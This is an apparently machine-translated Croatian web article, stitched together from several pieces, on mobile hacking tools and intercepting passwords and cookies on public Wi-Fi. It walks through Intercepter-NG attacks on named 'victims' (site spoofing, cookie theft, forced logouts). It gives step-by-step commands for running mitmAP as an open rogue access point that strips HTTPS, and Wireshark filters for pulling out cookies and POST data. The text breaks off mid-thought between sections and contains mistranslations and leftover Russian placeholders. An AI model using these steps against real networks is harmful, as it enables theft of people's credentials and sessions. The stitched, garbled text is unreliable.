Presrećemo lozinke i kolačiće. Eksperiment: kako ukrasti osobne podatke koristeći besplatni Wi-Fi Kako presresti podatke putem wifi Android

💖 Sviđa li vam se? Podijelite vezu sa svojim prijateljima

“Pametni telefon s alatima za hakiranje? Nema toga”, rekli bismo vam još nedavno. Samo na nekom Maemu bilo je moguće pokrenuti neke od uobičajenih alata za provedbu napada. Sada su mnogi poznati alati preneseni na iOS i Android, a neki alati za hakiranje posebno su napisani za mobilno okruženje. Može li pametni telefon zamijeniti prijenosno računalo u penetracijskim testovima? Odlučili smo to provjeriti.

ANDROID

Android je popularna platforma ne samo za obične smrtnike, već i za prave ljude. Broj korisnih ][-uslužnih programa ovdje je jednostavno nevjerojatan. Za ovo možemo zahvaliti UNIX korijenima sustava - to je uvelike pojednostavilo prijenos mnogih alata na Android. Nažalost, Google ne dopušta neke od njih u Trgovini Play, tako da ćete morati ručno instalirati odgovarajući APK. Također, neki uslužni programi zahtijevaju maksimalan pristup sustavu (na primjer, vatrozid iptables), tako da biste trebali unaprijed voditi računa o root pristupu. Svaki proizvođač ovdje koristi vlastitu tehnologiju, ali pronalaženje potrebnih uputa prilično je jednostavno. Resurs LifeHacker (bit.ly/eWgDlu) sastavio je dobar skup HOWTO-a. Međutim, ako ovdje niste mogli pronaći model, forum XDA-Developers (www.xda-developers.com) uvijek priskače u pomoć, gdje možete pronaći razne informacije o gotovo svakom modelu Android telefona. Na ovaj ili onaj način, neki od dolje opisanih uslužnih programa radit će bez root pristupa.

Započnimo pregled s neobičnim upraviteljem paketa. Programeri to zovu "uslužni programi za superkorisnike", a to nije daleko od istine. Nakon instaliranja BotBrewa dobivate repozitorij iz kojeg možete preuzeti ogroman broj poznatih alata kompiliranih za Android. Među njima: Python i Ruby interpreteri za pokretanje brojnih alata koji su u njima napisani, tcpdump sniffer i Nmap skener za analizu mreže, Git i Subversion za rad sa sustavima za kontrolu verzija i još mnogo toga.

Mrežni skeneri

Neupadljiv pametni telefon, koji za razliku od prijenosnog računala lako stane u džep i nikad ne izaziva sumnju, može biti koristan za istraživanje mreže. Gore smo već rekli kako možete instalirati Nmap, ali postoji još jedna opcija. PIPS je port Nmap skenera posebno prilagođen za Android, iako neslužbeni. To znači da možete brzo pronaći aktivne uređaje na mreži, odrediti njihov OS pomoću opcija otiska prsta, izvršiti skeniranje porta - ukratko, učiniti sve što je Nmap sposoban.

Postoje dva problema s korištenjem Nmapa, unatoč svoj njegovoj moći. Prvo, parametri za skeniranje prenose se putem tipki za pokretanje, koje ne samo da morate znati, već i moći unijeti pomoću nezgodne mobilne tipkovnice. I drugo, rezultati skeniranja u izlazu konzole nisu jasni koliko bismo željeli. Fing skener nema te nedostatke; vrlo brzo skenira mrežu, vrši otisak prsta, a zatim u preglednom obliku prikazuje popis svih dostupnih uređaja, dijeleći ih po vrsti (ruter, desktop, iPhone i tako dalje). U isto vrijeme, za svaki host možete brzo vidjeti popis otvorenih portova. Štoviše, upravo odavde možete se spojiti, recimo, na FTP, koristeći FTP klijent instaliran u sustavu - vrlo zgodno.

Kada se radi o analizi određenog hosta, uslužni program NetAudit može biti nezamjenjiv. Radi na bilo kojem Android uređaju (čak i bez root-a) i omogućuje vam ne samo brzo identificiranje uređaja na mreži, već i njihovo ispitivanje pomoću velike baze podataka otisaka prstiju za određivanje operativnog sustava, kao i CMS sustava koji se koriste na webu poslužitelj. Sada u bazi podataka postoji više od 3000 digitalnih otisaka prstiju.

Ako, naprotiv, trebate raditi na nižoj razini i pažljivo ispitati rad mreže, onda ne možete bez Net Tools. Ovo je nezamjenjiv skup uslužnih programa za rad administratora sustava, koji vam omogućuje potpunu dijagnostiku rada mreže na koju je uređaj spojen. Paket sadrži više od 15 različitih vrsta programa, kao što su ping, traceroute, arp, dns, netstat, route.

Manipulacija prometom

Njuškalo temeljeno na tcpdumpu pošteno bilježi sve podatke u pcap datoteku, koja se zatim može proučavati pomoću poznatih uslužnih programa kao što su Wireshark ili Network Miner. Budući da u njemu nisu implementirane nikakve mogućnosti za MITM napade, on je prije alat za analizu vašeg prometa. Na primjer, ovo je sjajan način da proučite što prenose programi instalirani na vašem uređaju iz sumnjivih repozitorija.

Ako govorimo o borbenim aplikacijama za Android, onda je jedna od najsenzacionalnijih FaceNiff, koja implementira presretanje i ubacivanje u presretnute web sesije. Preuzimanjem APK paketa s programom možete pokrenuti ovaj alat za hakiranje na gotovo svakom Android pametnom telefonu i, spajanjem na bežičnu mrežu, presresti račune raznih servisa: Facebook, Twitter, VKontakte i tako dalje - više od deset ukupno. Otmica sesije provodi se korištenjem ARP spoofing napada, ali napad je moguć samo na nezaštićenim vezama (FaceNiff se ne može ubaciti u SSL promet). Kako bi obuzdao protok scriptdisa, autor je ograničio maksimalni broj sesija na tri - tada morate kontaktirati programera za poseban aktivacijski kod.

Ako tvorac FaceNiffa želi novac za njegovo korištenje, onda je DroidSheep potpuno besplatan alat s istom funkcionalnošću. Istina, distribucijski komplet nećete pronaći na službenoj web stranici (to je zbog oštrih njemačkih zakona koji se odnose na sigurnosne alate), ali se bez problema može pronaći na internetu. Glavni zadatak uslužnog programa je presretanje korisničkih web sesija popularnih društvenih mreža, implementiranih pomoću istog ARP Spoofinga. Ali postoji problem sa sigurnim vezama: poput FaceNiffa, DroidSheep odlučno odbija raditi s HTTPS protokolom.

Ovaj uslužni program također pokazuje nesigurnost otvorenih bežičnih mreža, ali na nešto drugačijoj razini. Ne presreće korisničke sesije, ali dopušta HTTP prometu da prođe kroz sebe pomoću spoofing napada, izvodeći određene manipulacije s njim. Počevši od običnih šala (zamjena svih slika na web mjestu s trollfaceovima, okretanje svih slika ili, recimo, zamjena Google rezultata) do phishing napada, kada se korisniku daju lažne stranice popularnih servisa kao što su facebook.com, linkedin .com, vkontakte.ru i mnogi drugi.

Ako pitate koji je uslužni program za hakiranje za Android najmoćniji, onda Anti vjerojatno nema konkurenata. Ovo je prava hakerska kombinacija. Glavni zadatak programa je skeniranje perimetra mreže. Zatim u bitku ulaze različiti moduli uz pomoć kojih se implementira cijeli arsenal: prisluškivanje prometa, izvođenje MITM napada i iskorištavanje pronađenih ranjivosti. Istina, postoje i nedostaci. Prvo što upada u oči je da se iskorištavanje ranjivosti provodi samo sa središnjeg programskog poslužitelja koji se nalazi na internetu, zbog čega se mogu zaboraviti mete koje nemaju vanjsku IP adresu.

Prometni tuneli

Dobro poznati upravitelj datoteka sada je na pametnim telefonima! Kao iu verziji za stolna računala, postoji sustav dodataka za povezivanje s različitim mrežnim imenicima, kao i kanonski način rada s dva panela - posebno pogodan za tablete.

U redu, ali kako možete osigurati sigurnost svojih podataka koji se prenose preko otvorene bežične mreže? Uz VPN, koji Android podržava odmah, možete stvoriti SSH tunel. U tu svrhu postoji prekrasan uslužni program SSH Tunnel koji vam omogućuje usmjeravanje prometa odabranih aplikacija ili cijelog sustava u cjelini preko udaljenog SSH poslužitelja.

Često je potrebno slati promet preko proxyja ili SOX-a, au ovom slučaju ProxyDroid će pomoći. Jednostavno je: odaberete promet aplikacije koji želite tunelirati i odredite proxy (podržani su HTTP/HTTPS/SOCKS4/SOCKS5). Ako je potrebna autorizacija, ProxyDroid to također podržava. Usput, konfiguracija se može povezati s određenom bežičnom mrežom postavljanjem različitih postavki za svaku od njih.

Bežična mreža

Ugrađeni upravitelj bežične mreže nije previše informativan. Ako trebate brzo dobiti potpunu sliku pristupnih točaka u blizini, tada je uslužni program Wifi Analyzer izvrstan izbor. Ne samo da će prikazati sve obližnje pristupne točke, već će prikazati i kanal na kojem djeluju, njihovu MAC adresu i, što je najvažnije, vrstu korištene enkripcije (nakon što smo vidjeli željena slova "WEP", možemo pretpostaviti da pristup osigurana je sigurna mreža). Osim toga, uslužni program je idealan ako trebate pronaći gdje se fizički nalazi željena pristupna točka, zahvaljujući vizualnom indikatoru jačine signala.

Ovaj uslužni program, kako navodi njegov developer, može biti koristan kada je bežična mreža do kraja popunjena klijentima koji koriste cijeli kanal, a upravo je u tom trenutku potrebna dobra veza i stabilna veza. WiFiKill vam omogućuje da odspojite klijente s interneta selektivno ili na temelju određenog kriterija (na primjer, moguće je ismijavati sve članove Yabloka). Program jednostavno izvodi ARP spoofing napad i preusmjerava sve klijente na sebe. Ovaj algoritam je glupo jednostavno implementiran na temelju iptables. Ovo je upravljačka ploča za bežične mreže brze hrane :).

Revizija web aplikacija

Manipuliranje HTTP zahtjevima s računala je jednostavno; za to postoji ogroman broj uslužnih programa i dodataka za preglednike. U slučaju pametnog telefona sve je malo kompliciranije. HTTP Query Builder pomoći će vam da pošaljete prilagođeni HTTP zahtjev s parametrima koji su vam potrebni, na primjer, željeni kolačić ili promijenjeni korisnički agent. Rezultat zahtjeva bit će prikazan u standardnom pregledniku.

Ako je web mjesto zaštićeno lozinkom pomoću provjere autentičnosti osnovnog pristupa, možete provjeriti njegovu pouzdanost pomoću uslužnog programa Router Brute Force ADS 2. U početku je uslužni program stvoren za brute force lozinke na administratorskoj ploči usmjerivača, ali jasno je da se može. koristiti protiv bilo kojeg drugog izvora sa sličnom zaštitom. Uslužni program radi, ali je očito grub. Na primjer, programer ne predviđa brute force, već samo brute force pomoću rječnika.

Sigurno ste čuli za tako senzacionalan program za onemogućavanje web poslužitelja kao što je Slowloris. Načelo njegovog rada je kreiranje i zadržavanje maksimalnog broja veza s udaljenim web poslužiteljem, čime se sprječava povezivanje novih klijenata na njega. Dakle, AnDOSid je analog Slowlorisa u vašem Android uređaju! Odat ću vam tajnu, dvjestotinjak veza dovoljno je da osigura nestabilan rad svake četvrte web stranice koja pokreće Apache web server. I sve to - s vašeg telefona!

Razni uslužni programi

Pri radu s mnogim web aplikacijama i analizi njihove logike prilično je uobičajeno naići na podatke koji se prenose u kodiranom obliku, naime Base64. Encode će vam pomoći dekodirati ove podatke i vidjeti što je točno pohranjeno u njima. Možda ćete zamjenom navodnika, njihovim kodiranjem natrag u Base64 i zamjenom u URL-u stranice koju istražujete, dobiti željenu pogrešku upita baze podataka.

Ako trebate heksadecimalni uređivač, postoji i jedan za Android. S HexEditorom možete uređivati ​​bilo koje datoteke, uključujući sistemske datoteke, ako podignete prava programa na superkorisnika. Izvrsna zamjena za standardni uređivač teksta, omogućuje vam da lako pronađete željeni dio teksta i promijenite ga.

Udaljeni pristup

Nakon što imate pristup udaljenom hostu, morate ga moći koristiti. A za to su nam potrebni klijenti. Počnimo sa SSH, gdje je ConnectBot već de facto standard. Uz praktično sučelje, pruža mogućnost organiziranja sigurnih tunela putem SSH veza.

Koristan program koji vam omogućuje povezivanje s udaljenom radnom površinom putem RDP ili VNC usluga. Jako mi je drago što su ovo dva klijenta u jednom; nema potrebe za korištenjem različitih alata za RDP i VNC.

MIB preglednik posebno napisan za Android, s kojim možete upravljati mrežnim uređajima koristeći SNMP protokol. Može biti koristan za razvoj vektora napada na različitim usmjerivačima, jer standardni niz zajednice (drugim riječima, pristupna lozinka) za upravljanje putem SNMP-a još nije poništen.

iOS

iOS platforma nije ništa manje popularna među programerima sigurnosnih uslužnih programa. Ali ako su u slučaju Androida root prava bila potrebna samo za neke aplikacije, onda je na Apple uređajima gotovo uvijek potrebno jailbreaking. Srećom, čak i za najnoviji firmware iDevices (5.1.1) već postoji alat za bjekstvo iz zatvora. Uz potpuni pristup, također dobivate alternativni upravitelj aplikacija, Cydia, koji već sadrži mnoge pomoćne programe.

Rad sa sustavom

Prva stvar s kojom želim početi je instaliranje terminala. Iz očitih razloga nije uključen u standardnu ​​isporuku mobilnog OS-a, ali će nam trebati za pokretanje uslužnih programa konzole, o čemu ćemo dalje raspravljati. Najbolja implementacija emulatora terminala je MobileTerminal - podržava više terminala, upravljačke geste (na primjer, za slanje Control-C) i općenito je impresivan svojom promišljenošću.

Druga, složenija opcija za pristup konzoli uređaja je instaliranje OpenSSH-a na njemu (to se radi kroz Cydiju) i povezivanje na njega lokalno putem SSH klijenta. Ako koristite pravi klijent kao što je iSSH, koji ima nevjerojatnu kontrolu zaslona osjetljivog na dodir, onda je ova metoda još praktičnija od korištenja MobileTerminala.

Presretanje podataka

Sada kada imate pristup konzoli, možete isprobati pomoćne programe. Krenimo od Pirnija koji je ušao u povijest kao punopravni njuškalo za iOS. Nažalost, strukturno ograničeni Wi-Fi modul ugrađen u uređaj ne može se prebaciti u promiskuitetni način rada neophodan za normalno presretanje podataka. Tako se za presretanje podataka koristi klasični ARP spoofing uz pomoć kojeg se sav promet propušta kroz sam uređaj. Standardna verzija uslužnog programa pokreće se s konzole, gdje je osim parametara MITM napada navedeno i ime PCAP datoteke u koju se bilježi sav promet. Uslužni program ima napredniju verziju - Pirni Pro, koja se može pohvaliti grafičkim sučeljem. Štoviše, može analizirati HTTP promet u hodu i čak automatski izvući zanimljive podatke iz njega (na primjer, prijave i lozinke), koristeći regularne izraze koji su navedeni u postavkama.

Poznati sniffer Intercepter-NG, o kojem smo već nekoliko puta pisali, odnedavno ima i konzolnu verziju. Kako autor kaže, većina koda je napisana u čistom ANSI C, koji se jednako ponaša u gotovo svakom okruženju, tako da je konzolna verzija od samog početka radila kako na desktop Windowsima, Linuxu i BSD-u, tako i na mobilnim platformama, uključujući iOS i Android. Konzolna verzija već implementira otimanje lozinki koje se prenose preko raznih protokola, presretanje instant messenger poruka (ICQ/Jabber i mnogi drugi), kao i vraćanje datoteka iz prometa (HTTP/FTP/IMAP/POP3/SMTP/SMB). Istodobno su dostupne funkcije mrežnog skeniranja i visokokvalitetni ARP Poison. Za ispravan rad prvo morate instalirati libpcap paket preko Cydije (ne zaboravite omogućiti razvojne pakete u postavkama). Sve upute za pokretanje svode se na postavljanje točnih prava: chmod +x intercepter_ios. Zatim, ako pokrenete sniffer bez parametara, pojavit će se jasno interaktivno sučelje Itercepter, što vam omogućuje pokretanje bilo kakvih napada.

Teško je povjerovati, ali ovaj sofisticirani alat za implementaciju MITM napada konačno je prebačen na iOS. Nakon ogromnog rada, uspjeli smo napraviti punopravni mobilni port. Kako biste se spasili od plesanja s tamburinom oko ovisnosti tijekom samokompilacije, bolje je instalirati već izgrađeni paket pomoću Cydije, nakon dodavanja theworm.altervista.org/cydia (TWRepo repozitorij) kao izvora podataka. Komplet također uključuje uslužni program etterlog, koji pomaže izvući razne vrste korisnih informacija iz prikupljenog prometa (na primjer, FTP računi za pristup).

Analiza bežične mreže

U starijim verzijama iOS-a majstori su pokrenuli aircrack i mogli razbiti WEP ključ, ali provjerili smo: program ne radi na novim uređajima. Stoga, da bismo proučavali Wi-Fi, morat ćemo se zadovoljiti samo Wi-Fi skenerima. WiFi Analyzer analizira i prikazuje informacije o svim dostupnim 802.11 mrežama oko vas, uključujući informacije o SSID-u, kanalima, dobavljačima, MAC adresama i vrstama enkripcije. Uslužni program gradi vizualne grafikone u stvarnom vremenu na temelju podataka prisutnih u eteru. S takvim programom lako je pronaći fizičku lokaciju točke ako je iznenada zaboravite i, na primjer, pogledate WPS PIN, što može biti korisno za povezivanje.

Mrežni skeneri

Koji program koristi bilo koji tester penetracije bilo gdje u svijetu, bez obzira na ciljeve i ciljeve? Mrežni skener. A u slučaju iOS-a, ovo će najvjerojatnije biti najmoćniji Scany toolkit. Zahvaljujući skupu ugrađenih uslužnih programa, možete brzo dobiti detaljnu sliku mrežnih uređaja i, na primjer, otvorenih priključaka. Osim toga, paket uključuje pomoćne programe za testiranje mreže kao što su ping, traceroute, nslookup.

Međutim, mnogi ljudi preferiraju Fing. Skener je prilično jednostavne i ograničene funkcionalnosti, ali je sasvim dovoljan za prvo upoznavanje mreže, recimo, kafeterije :). Rezultati prikazuju informacije o dostupnim uslugama na udaljenim strojevima, MAC adresama i imenima računala povezanih na skeniranu mrežu.

Čini se da su svi zaboravili na Nikta, ali zašto? Uostalom, možete jednostavno instalirati ovaj skener web ranjivosti, napisan u skriptnom jeziku (naime Perl), putem Cydije. To znači da ga možete jednostavno pokrenuti na svom jailbreakiranom uređaju s terminala. Nikto će vam rado pružiti dodatne informacije o testiranom web resursu. Osim toga, možete vlastitim rukama dodati vlastite potpise pretraživanja u njegovu bazu znanja.

Ovaj moćni alat za automatsko iskorištavanje SQL ranjivosti napisan je u Pythonu, što znači da nakon što instalirate tumač, možete ga jednostavno koristiti izravno sa svog mobilnog uređaja.

Daljinski upravljač

Mnogim mrežnim uređajima (uključujući skupe usmjerivače) upravlja se pomoću SNMP protokola. Ovaj vam uslužni program omogućuje skeniranje podmreža za dostupne SNMP usluge s unaprijed poznatim vrijednostima nizova zajednice (drugim riječima, standardnim lozinkama). Imajte na umu da je traženje SNMP usluga sa standardnim nizovima zajednice (javno/privatno) u pokušaju dobivanja pristupa upravljanju uređajem sastavni dio svakog testa prodora, zajedno s identificiranjem samog perimetra i identificiranjem usluga.

Dva pomoćna programa istog proizvođača dizajnirana su za povezivanje s udaljenom radnom površinom pomoću RDP i VNC protokola. Postoji mnogo sličnih uslužnih programa u App Storeu, ali ovo su oni koji su posebno jednostavni za korištenje.

Oporavak lozinke

Legendarni program koji pomaže milijunima hakera diljem svijeta da "zapamte" svoju lozinku prebačen je na iOS. Sada možete pretraživati ​​lozinke za usluge kao što su HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 i mnoge druge izravno s vašeg iPhonea. Istina, za učinkovitiji napad bolje je opskrbiti se dobrim rječnicima grube sile.

Svatko zna iz prve ruke ranjivost korištenja standardnih lozinki. Pass Mule je vrsta direktorija koji sadrži sve vrste standardnih prijava i lozinki za mrežne uređaje. Prikladno su organizirani prema nazivu dobavljača, proizvodu i modelu, tako da neće biti teško pronaći onaj koji vam je potreban. Program je dizajniran da uštedi vrijeme na traženju priručnika za usmjerivač, standardne prijave i lozinke za koje trebate saznati.

Iskorištavanje ranjivosti

Teško je zamisliti uslužni program za više hakiranja od Metasploita i to je ono što zaključuje našu današnju recenziju. Metasploit je paket različitih alata čija je glavna zadaća iskorištavanje ranjivosti u softveru. Zamislite: oko 1000 pouzdanih, dokazanih i potrebnih podviga u svakodnevnom životu pentestera - upravo na vašem pametnom telefonu! Uz pomoć takvog alata možete se stvarno uspostaviti u bilo kojoj mreži. Metasploit ne samo da vam omogućuje iskorištavanje nedostataka u poslužiteljskim aplikacijama – dostupni su i alati za napad na klijentske aplikacije (na primjer, putem modula Browser Autopwn, kada se borbeni teret umetne u promet klijenta). Ovdje se mora reći da ne postoji mobilna verzija kompleta alata, ali možete instalirati standardni paket na Apple uređaj koristeći .

presretač je višenamjenski mrežni alat koji vam omogućuje dobivanje podataka iz prometa (lozinke, instant messenger poruke, korespondencija itd.) i implementaciju raznih MiTM napada.

Intercepter programsko sučelje
Glavna funkcionalnost

  • Presretanje instant messenger poruka.
  • Presretanje kolačića i lozinki.
  • Presretanje aktivnosti (stranica, datoteka, podataka).
  • Sposobnost lažiranja preuzimanja datoteka dodavanjem zlonamjernih datoteka. Može se koristiti zajedno s drugim uslužnim programima.
  • Zamjena Https certifikata s Http.
Načini rada
Način glasnika– omogućuje vam provjeru korespondencije koja je poslana u nešifriranom obliku. Korišten je za presretanje poruka u takvim instant messengerima kao što su ICQ, AIM, JABBER poruke.

Način oživljavanja– oporavak korisnih podataka iz prometa, iz protokola koji prenose promet u čistom tekstu. Kada žrtva gleda datoteke, stranice ili podatke, oni mogu biti djelomično ili potpuno presretnuti. Osim toga, možete odrediti veličinu datoteka kako ne biste preuzimali program u malim dijelovima. Ove informacije se mogu koristiti za analizu.

Način rada s lozinkom– način rada s kolačićima. Na taj način moguće je pristupiti posjećenim datotekama žrtve.

Način skeniranja– glavni način za testiranje. Za početak skeniranja morate desnom tipkom miša kliknuti Smart Scan. Nakon skeniranja, prozor će prikazati sve sudionike mreže, njihov operativni sustav i druge parametre.

Osim toga, u ovom načinu rada možete skenirati portove. Morate koristiti funkciju skeniranja portova. Naravno, za to postoji mnogo više funkcionalnih uslužnih programa, ali prisutnost ove funkcije je važna točka.

Ako nas zanima ciljani napad na mrežu, tada nakon skeniranja trebamo dodati ciljani IP u Nat pomoću naredbe (Add to Nat). U drugom prozoru bit će moguće izvesti druge napade.

Nat način. Glavni način, koji vam omogućuje izvođenje niza napada putem ARP-a. Ovo je glavni prozor koji dopušta ciljane napade.

DHCP način rada. Ovo je način koji vam omogućuje podizanje vašeg DHCP poslužitelja za implementaciju DHCP napada u sredini.

Neke vrste napada koje je moguće izvesti
lažiranje web mjesta

Da biste podvalili žrtvinu web stranicu, morate otići na Target, nakon čega trebate navesti web stranicu i njegovu zamjenu. Na ovaj način možete zamijeniti dosta mjesta. Sve ovisi o tome koliko je lažnjak kvalitetan.

lažiranje web mjesta

Primjer za VK.com

Odabir MiTM napada

Promjena pravila ubrizgavanja
Kao rezultat toga, žrtva otvara lažnu web stranicu kada traži vk.com. A u načinu rada s lozinkom trebali bi postojati prijava i lozinka žrtve:

Za izvođenje ciljanog napada potrebno je odabrati žrtvu s popisa i dodati je meti. To se može učiniti pomoću desne tipke miša.

Dodavanje MiTm napada
Sada možete koristiti Ressurection Mode za oporavak raznih podataka iz prometa.

Dosjei i informacije o žrtvama putem MiTm napada
Prijevara prometa

Određivanje postavki
Nakon toga, zahtjev žrtve će se promijeniti iz "povjerenje" u "gubitnik".

Osim toga, možete uništiti kolačiće tako da se žrtva odjavi sa svih računa i ponovno prijavi. To će vam omogućiti presretanje prijava i lozinki.

Uništavanje kolačića

Kako pomoću Interceptera vidjeti potencijalnog njuškala na mreži?

Pomoću opcije Promisc Detection možete otkriti uređaj koji skenira na lokalnoj mreži. Nakon skeniranja, stupac statusa prikazat će "Sniffer". Ovo je prvi način otkrivanja skeniranja na lokalnoj mreži.

Otkrivanje njuškala
SDR HackRF uređaj


HackRF
SDR je vrsta radio prijemnika koji vam omogućuje rad s različitim parametrima radio frekvencije. Tako je moguće presresti signal Wi-Fi, GSM, LTE itd.

HackRF je puni SDR uređaj za 300 USD. Autor projekta, Michael Ossman, razvija uspješne uređaje u tom smjeru. Ubertooth Bluetooth sniffer prethodno je razvijen i uspješno implementiran. HackRF je uspješan projekt koji je na Kickstarteru skupio više od 600 tisuća kuna. 500 takvih uređaja već je prodano za beta testiranje.

HackRF radi u frekvencijskom rasponu od 30 MHz do 6 GHz. Frekvencija uzorkovanja je 20 MHz, što vam omogućuje presretanje signala iz Wi-FI i LTE mreža.

Kako se zaštititi na lokalnoj razini?

Prvo, upotrijebimo softver SoftPerfect WiFi Guard. Postoji prijenosna verzija koja ne zauzima više od 4 MB. Omogućuje vam skeniranje vaše mreže i prikaz koji su uređaji prikazani na njoj. Ima postavke koje vam omogućuju odabir mrežne kartice i maksimalnog broja uređaja za skeniranje. Osim toga, možete postaviti interval skeniranja.


Programsko sučelje SoftPerfect WiFi Guard
Nakon skeniranja, program šalje obavijesti o tome koliko ima nepoznatih uređaja. To nam omogućuje da dodamo i označimo pouzdane korisnike i primijetimo ako se netko spojio i počne slušati promet. Obavijesti će biti poslane nakon svakog intervala skeniranja. To vam omogućuje da onemogućite određenog prevaranta na usmjerivaču ako postoje sumnjive aktivnosti.


Postavke programa SoftPerfect WiFi Guard


Mogućnost dodavanja komentara za korisnike


Prozor obavijesti za nepoznate uređaje nakon svakog navedenog intervala skeniranja

Zaključak
Stoga smo u praksi ispitali kako koristiti softver za presretanje podataka unutar mreže. Proučili smo nekoliko specifičnih napada koji vam omogućuju dobivanje podataka za prijavu, kao i drugih informacija. Osim toga, pogledali smo SoftPerfect WiFi Guard, koji vam omogućuje da zaštitite svoju lokalnu mrežu od prisluškivanja prometa na primitivnoj razini.

I pokreće ih automatski, zahvaljujući čemu se postiže HTTPS / HSTS zaobilaženje. S mitmAP-om ne morate ulaziti u ovaj proces, ali ako želite učiniti nešto slično, na primjer sa create_ap, pogledajte "Upute za korištenje SSLStrip+ i dns2proxy za zaobilaženje HSTS-a".

mitmAP vam omogućuje korištenje najučinkovitijih metoda za vraćanje HTTPS-a na HTTP gotovo bez unosa naredbe (i bez razumijevanja mehanizma zaobilaženja HTTPS-a). U mojim testovima, lozinka se prenosila u čistom tekstu za vk.com, yandex.ru, mail.ru.

Ova skripta je napravljena u dvije verzije - za rad u Kali Linuxu ili u Raspberry PI.

Skripta bi trebala raditi na izvedenicama Debiana ako instalirate ovisnosti; ali neće raditi, na primjer, u Arch Linuxu / BlackArchu zbog metode koju je autor odabrao za pokretanje usluga.

Upute za korištenje mitmAP-a

Preuzmite skriptu:

Git klon https://github.com/xdavidhu/mitmAP.git cd mitmAP/

Pokreni ga:

Sudo python3 mitmAP.py

Skripta će započeti pitanjem:

[?] Instalirati/ažurirati ovisnosti? Da/ne:

Prijevod: instalacija/ažuriranje ovisnosti?

Ako pokrećete prvi put, onda se složite, tj. pritisni enter. U budućnosti možete birati n(Ne).

Sljedeće pitanje:

[?] Unesite naziv vašeg bežičnog sučelja (za AP):

Prijevod: Unesite naziv vašeg bežičnog sučelja (za AP). Ako ne znate naziv svojih sučelja, tada u drugom prozoru pokrenite naredbu:

Prikazat će sva mrežna sučelja na vašem sustavu. I tim

Sudo iw dev

prikazat će samo bežična mrežna sučelja.

U Kali Linuxu obično se poziva bežično sučelje wlan0(a ako su dva, onda drugi ima ime wlan1).

[?] Unesite naziv vašeg sučelja povezanog s internetom:

Prijevod: Unesite naziv sučelja spojenog na Internet.

U Kali Linuxu obično se poziva žično sučelje eth0. Također možete koristiti drugu Wi-Fi karticu za povezivanje s internetom.

[?] Koristiti SSLSTRIP 2.0? Da/ne:

Prijevod: Skripta pita treba li koristiti SSLStrip+. U današnje vrijeme, kada se značajan, ako ne i najveći, dio prometa prenosi putem HTTPS-a (kriptirano), ova se opcija toplo preporučuje.

[?] Stvorite novu HOSTAPD konfiguracijsku datoteku na "/etc/hostapd/hostapd.conf" Da/ne:

Prijevod: Trebam li stvoriti novu konfiguracijsku datoteku hostapd.

Ako ga pokrećete prvi put, to morate učiniti. Tijekom sljedećih pokretanja, ako nećete promijeniti postavke AP-a, možete odabrati n(tj. "ne").

Postavljanje AP-a:

[?] Unesite SSID za AP:

Prijevod: Unesite naziv za AP.

[?] Unesite kanal za AP:

Prijevod: Unesite broj AP kanala.

[?] Omogućiti WPA2 enkripciju? da/ne:

Prijevod: Trebam li omogućiti WPA2 enkripciju?

Ako omogućite enkripciju, morat ćete unijeti zaporku za povezivanje s AP-om. Za naše potrebe, mi biramo "ne".

Zadnja postavka AP-a:

[?] Postaviti ograničenje brzine za klijente? Da/ne:

Prijevod: Trebam li postaviti ograničenje brzine za klijente?

Ja biram ne

[?] Pokrenuti WIRESHARK na wlan0? Da/ne:

mitmAP analiza podataka

mitmAP prikazuje presretnute podatke, uključujući prijave i lozinke, u svom glavnom prozoru:

U svojoj mapi ona stvara imenik cjepanice sa dvije datoteke: mitmap-sslstrip.log I mitmap-wireshark.pcap. Prva datoteka sadrži prikupljene podatke u tekstualnom obliku. A drugi je namijenjen analizi u programu Wireshark.

Imajte na umu: kada ponovno pokrenete program, ove datoteke se prebrišu! Oni. ako namjeravate kasnije analizirati te datoteke, morate se pobrinuti za njihovo premještanje ili preimenovanje, inače će jednostavno biti izbrisane.

Ako odlučite pokrenuti Wiresharkov prozor i prikazati prenesene slike pomoću Driftneta, možete ih također koristiti za praćenje prenesenih podataka u stvarnom vremenu.

Analiza podataka u Wiresharku

Wireshark ima vrlo detaljan filter podataka, njegovu raznolikost možete vidjeti na stranici službene dokumentacije

Dat ću primjere nekoliko aktivnih filtara.

Za prikaz svih HTTP zahtjeva poslanih metodom POST u Wiresharku:

Http.request.method == "POST"

Za prikaz podataka poslanih ili primljenih s određene domene (umjesto unesite domenu koja vas zanima, na primjer, vk.com):

Http.host==" "

Za traženje niza u cijelom toku poslanih podataka koristi se sljedeći filter (umjesto<строка>unesite niz koji želite pretražiti):

Okvir sadrži"<строка>"

Za prikaz kolačića u Wiresharku:

Http.kolačić

Ako ste zainteresirani za kolačiće s određenim nazivom, upotrijebite:

Http.cookie sadrži "<имя_куки>"

Za prikaz zahtjeva u Wiresharku poslanih GET ili POST metodom:

Http.request.uri sadrži "?" ili http.request.method=="POST"

Ako želite pronaći podatke razmijenjene s FTP poslužiteljem, tada u Wiresharku možete koristiti jedan od sljedećih filtara:

Tcp.port==21 || tcp.port==20

Njuškanje podataka u drugim programima

Iako mitmAP koristi zanimljive programe, uvijek možete izvršiti analizu podataka s drugim alatima. Na primjer, ako želite koristiti Bettercap, morate uzeti u obzir sljedeće:

  • ARP spoofing nije potreban
  • Nije potrebno otkrivanje klijenta
  • Nema potrebe za omogućavanjem SSLStrip-a.

Oni. naredba bi mogla izgledati ovako:

Sudo bettercap -X -I wlan0 -S NIJEDAN --no-otkrivanje

Sudo bettercap -X -I wlan0 -S NEMA --no-discovery --proxy --no-sslstrip

Gašenje mitmAP-a

Za isključivanje programa dvaput brzo pritisnite CTRL+C. Dopustite mi da vas podsjetim da kada ponovno pokrenete program, on će prebrisati datoteke s primljenim podacima. Oni. morate ih premjestiti u drugu mapu ako ih kasnije želite analizirati.

Što je kolačić?

Postoji mehanizam koji omogućuje http poslužitelju da spremi neke tekstualne informacije na korisnikovo računalo i zatim im pristupi. Ove informacije nazivaju se kolačići. U biti, svaki kolačić je par: naziv parametra i njegova vrijednost. Svakom kolačiću također je dodijeljena domena kojoj pripada. Iz sigurnosnih razloga, u svim preglednicima http poslužitelj smije pristupiti samo kolačiću svoje domene. Osim toga, kolačići mogu imati datum isteka, u kojem će slučaju biti pohranjeni na računalu do tog datuma, čak i ako zatvorite sve prozore preglednika.


Zašto su kolačići važni?

Svi višekorisnički sustavi koriste kolačiće za identifikaciju korisnika. Točnije, korisnikova trenutna veza s uslugom, korisnička sesija. Ako netko prepozna vaše kolačiće, moći će se prijaviti u sustav u vaše ime. Budući da trenutačno vrlo malo internetskih izvora provjerava promjene IP adrese tijekom jedne korisničke sesije.


